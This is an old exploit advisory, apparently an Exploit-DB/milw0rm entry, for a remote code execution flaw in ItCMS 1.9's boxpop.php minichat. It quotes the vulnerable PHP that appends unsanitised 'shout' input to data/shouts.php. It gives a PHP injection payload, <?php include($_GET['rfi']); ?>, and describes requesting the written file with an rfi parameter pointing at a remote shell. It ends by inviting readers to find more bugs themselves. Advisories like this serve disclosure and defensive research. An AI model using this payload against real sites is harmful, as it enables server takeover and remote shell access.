ItCMS 1.9 - 'boxpop.php' Remote Code Execution

EDB-ID:

5532


Author:

Cod3rZ

Type:

webapps


Platform:

PHP

Date:

2008-05-02


#===========================================================================================================================#
#                                     _ ____             _        _ _                _                                      #
#                          __ ___  __| |__ /_ _ ___     | |_  ___| | |_____ __ _____| |__       ___ _  _                    #
#                         / _/ _ \/ _` ||_ \ '_|_ /  _  | ' \/ -_) | / _ \ V  V / -_) '_ \  _  / -_) || |                   #
#                         \__\___/\__,_|___/_| /__| (_) |_||_\___|_|_\___/\_/\_/\___|_.__/ (_) \___|\_,_|                   #
#===========================================================================================================================#
#                                              ItCMS 1.9 Remote File Rewriting                                              #
#===========================================================================================================================#
#                                                      Author : Cod3rZ                                                      #
#===========================================================================================================================#
#                                              Site : http://cod3rz.helloweb.eu                                             #
#                                          Site : http://devilsnight.altervista.org                                         #
#===========================================================================================================================#
# Remote File Rewriting:                                                                                                    #
#===========================================================================================================================#
# /box/minichat/boxpop.php                                                                                                  #
#===========================================================================================================================#
# if ($_POST["shout"]!=""){                                                                                                 #
# $shout = $_POST['shout'];                                                                                           	    #
# } else if ($_GET["shout"]!=""){                                                                                           #
# $shout = $_GET["shout"];                                                                                            	    #
# }                                                                                                                         #
# [...]                                                                                                                     #
# $shout = trim($shout);                                                                                                    #
# $shout = stripslashes($shout);                                                                                            #
# $shout = str_replace ("\r\n", " [br] ", $shout);                                                                          #
# $shout = first($shout);                                                                                                   #
# [...]                                                                                                                     #
# $FileName="data/shouts.php";                                                                                              #
# if($FilePointer=fopen($FileName, "a+")){                                                                                  #
# fwrite($FilePointer,"$name|^|$shout|^|$date|^|$time|^|$_SERVER[REMOTE_ADDR]|^|\n");                                       #
# fclose($FilePointer);                                                                                                     #
#===========================================================================================================================#
# So we can write malicious code such as <?php include($_GET['rfi']); ?> into the variable $shout,                          #
# and then request data/shouts.php?rfi=[shell]                                                                              #
# (including a remote URL through rfi= requires allow_url_include to be enabled in php.ini)                                 #
#===========================================================================================================================#
# There are many other bugs; find them yourself                                                                             #
#===========================================================================================================================#
# Devils Night Corporation - http://devilsnight.altervista.org                                                              #
#===========================================================================================================================#

# milw0rm.com [2008-05-02]